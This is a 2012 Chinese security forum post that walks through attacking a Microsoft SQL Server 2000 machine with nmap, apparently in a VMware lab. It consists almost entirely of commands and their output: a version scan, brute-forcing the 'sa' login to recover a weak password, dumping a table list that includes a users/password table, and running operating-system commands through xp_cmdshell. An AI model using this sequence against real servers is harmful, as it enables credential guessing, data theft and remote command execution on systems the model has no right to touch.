切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
304 NMAP : Attack Mssql[复制链接]
发表于 2012-10-11 23:03:17 | 显示全部楼层 |!read_mode!
scnner
  1. root@Dis9Team:~# nmap 5.5.5.3 -sV 5.5.5.3 -p1433 -vv

  2. Starting Nmap 5.21 ( http://nmap.org ) at 2012-09-20 23:32 PDT
  3. NSE: Loaded 4 scripts for scanning.
  4. Initiating ARP Ping Scan at 23:32
  5. Scanning 2 hosts [1 port/host]
  6. Completed ARP Ping Scan at 23:32, 0.10s elapsed (2 total hosts)
  7. Initiating Parallel DNS resolution of 2 hosts. at 23:32
  8. Completed Parallel DNS resolution of 2 hosts. at 23:32, 0.26s elapsed
  9. Initiating SYN Stealth Scan at 23:32
  10. Scanning 2 hosts [1 port/host]
  11. Discovered open port 1433/tcp on 5.5.5.3
  12. Discovered open port 1433/tcp on 5.5.5.3
  13. Completed SYN Stealth Scan at 23:32, 0.10s elapsed (2 total ports)
  14. Initiating Service scan at 23:32
  15. Scanning 2 services on 2 hosts
  16. Completed Service scan at 23:32, 11.00s elapsed (2 services on 2 hosts)
  17. NSE: Script scanning 2 hosts.
  18. NSE: Script Scanning completed.
  19. Nmap scan report for 5.5.5.3
  20. Host is up (0.00015s latency).
  21. Scanned at 2012-09-20 23:32:32 PDT for 12s
  22. PORT     STATE SERVICE  VERSION
  23. 1433/tcp open  ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4
  24. MAC Address: 00:0C:29:03:16:F8 (VMware)
  25. Service Info: OS: Windows

  26. Nmap scan report for 5.5.5.3
  27. Host is up (0.00022s latency).
  28. Scanned at 2012-09-20 23:32:32 PDT for 12s
  29. PORT     STATE SERVICE  VERSION
  30. 1433/tcp open  ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4
  31. MAC Address: 00:0C:29:03:16:F8 (VMware)
  32. Service Info: OS: Windows
复制代码

1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4

PASSWD
  1. root@Dis9Team:/tmp# cd /pen/nmap/share/nmap/scripts/
  2. root@Dis9Team:/pen/nmap/share/nmap/scripts# wget http://nmap.org/svn/scripts/ms-sql-brute.nse
复制代码


暴力破解 NAME 和PASS是TMP目录下的字典
  1. root@Dis9Team:/tmp# nmap -p 1433 --script ms-sql-brute --script-args userdb=name,passdb=pass 5.5.5.3

  2. Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:42 PDT
  3. Nmap scan report for 5.5.5.3
  4. Host is up (0.00021s latency).
  5. PORT     STATE SERVICE
  6. 1433/tcp open  ms-sql-s
  7. | ms-sql-brute:
  8. |_  sa:123456 => Login Success
  9. MAC Address: 00:0C:29:03:16:F8 (VMware)

  10. Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
复制代码


Select
  1. root@Dis9Team:~# nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=123456,ms-sql-query.query="SELECT @@version" 5.5.5.3

  2. Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:47 PDT
  3. Nmap scan report for 5.5.5.3
  4. Host is up (0.00021s latency).
  5. PORT     STATE SERVICE
  6. 1433/tcp open  ms-sql-s
  7. | ms-sql-query: (Use --script-args=mssql-query.query='<QUERY>' to change query.)
  8. |   SELECT @@version version
  9. |   version
  10. |   =======
  11. |   Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
  12. |           May  3 2005 23:18:38
  13. |           Copyright (c) 1988-2003 Microsoft Corporation
  14. |_          Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
  15. MAC Address: 00:0C:29:03:16:F8 (VMware)

  16. Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
  17. root@Dis9Team:~#
复制代码


GET tables
  1. root@Dis9Team:~# nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=123456 5.5.5.3

  2. Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:48 PDT
  3. Nmap scan report for 5.5.5.3
  4. Host is up (0.00027s latency).
  5. PORT     STATE SERVICE
  6. 1433/tcp open  ms-sql-s
  7. | ms-sql-tables:
  8. |   pen
  9. |     table        column        type        length
  10. |     =====        ======        ====        ======
  11. |     products        id        int        4
  12. |     products        prodName        varchar        50
  13. |     users        userId        int        4
  14. |     users        userName        varchar        50
  15. |     users        userPass        varchar        20
  16. |   
  17. |   Restrictions
  18. |     Output restricted to 2 tables (see mssql-tables.maxtables)
  19. |     Output restricted to 5 databases (see mssql-tables.maxdb)
  20. |_    No filter (see mssql-tables.keywords)
  21. MAC Address: 00:0C:29:03:16:F8 (VMware)

  22. Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
  23. root@Dis9Team:~#
复制代码


cmdshell
  1. root@Dis9Team:~# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=123456,ms-sql-xp-cmdshell.cmd="ipconfig" 5.5.5.3

  2. Starting Nmap 5.51 ( http://nmap.org ) at 2012-09-20 23:50 PDT
  3. Nmap scan report for 5.5.5.3
  4. Host is up (0.00027s latency).
  5. PORT     STATE SERVICE
  6. 1433/tcp open  ms-sql-s
  7. | ms-sql-xp-cmdshell: (Use --script-args=mssql-xp-cmdshell.cmd='<CMD>' to change command.)
  8. |   ipconfig /all
  9. |   output
  10. |   ======
  11. |   
  12. |   Windows IP Configuration
  13. |   
  14. |      Host Name . . . . . . . . . . . . : fuzzexp-f60914c
  15. |      Primary Dns Suffix  . . . . . . . :
  16. |      Node Type . . . . . . . . . . . . : Hybrid
  17. |      IP Routing Enabled. . . . . . . . : No
  18. |      WINS Proxy Enabled. . . . . . . . : No
  19. |      DNS Suffix Search List. . . . . . : localdomain
  20. |   
  21. |   Ethernet adapter ,0\xDE\xA5:
  22. |   
  23. |      Connection-specific DNS Suffix  . : localdomain
  24. |      Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
  25. |      Physical Address. . . . . . . . . : 00-0C-29-03-16-F8
  26. |      DHCP Enabled. . . . . . . . . . . : Yes
  27. |      Autoconfiguration Enabled . . . . : Yes
  28. |      IP Address. . . . . . . . . . . . : 5.5.5.3
  29. |      Subnet Mask . . . . . . . . . . . : 255.255.255.0
  30. |      Default Gateway . . . . . . . . . : 5.5.5.2
  31. |      DHCP Server . . . . . . . . . . . : 5.5.5.100
  32. |      DNS Servers . . . . . . . . . . . : 5.5.5.2
  33. |      Primary WINS Server . . . . . . . : 5.5.5.2
  34. |      Lease Obtained. . . . . . . . . . : 2012t9\x0821\xE5 14:45:11
  35. |      Lease Expires . . . . . . . . . . : 2012t9\x0821\xE5 15:15:11
  36. |_  
  37. MAC Address: 00:0C:29:03:16:F8 (VMware)

  38. Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
  39. root@Dis9Team:~#
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 07:26

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部